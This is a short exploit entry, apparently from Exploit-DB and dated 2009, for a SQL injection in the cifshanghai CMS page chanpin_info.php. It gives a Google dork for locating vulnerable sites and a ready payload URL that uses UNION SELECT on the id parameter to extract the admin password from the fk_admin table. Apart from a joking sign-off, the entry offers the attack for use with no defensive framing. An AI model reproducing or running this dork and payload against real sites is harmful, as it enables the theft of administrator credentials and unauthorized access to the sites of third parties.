Cifshanghai - 'chanpin_info.php' CMS SQL Injection

EDB-ID:

10105

CVE:

N/A




Platform:

PHP

Date:

2009-11-16


=====================================
| cifshanghai.com script The news (chanpin_info.php) by pass
=====================================
Author: ProF.Code
Email : adt@hotmail.com
~~~~~~~~~~~~~~~~~~~~
dork(google) : "Powered by cifshanghai.com"
~~~~~~~~~~~~~~~~~~~~
demo: http://server/chanpin_info.php?showlei=&Leiid=&n=1&id=-177+union+select+1,password,3,4,5,6,7,8+from+fk_admin
user : admin
pass : From site :D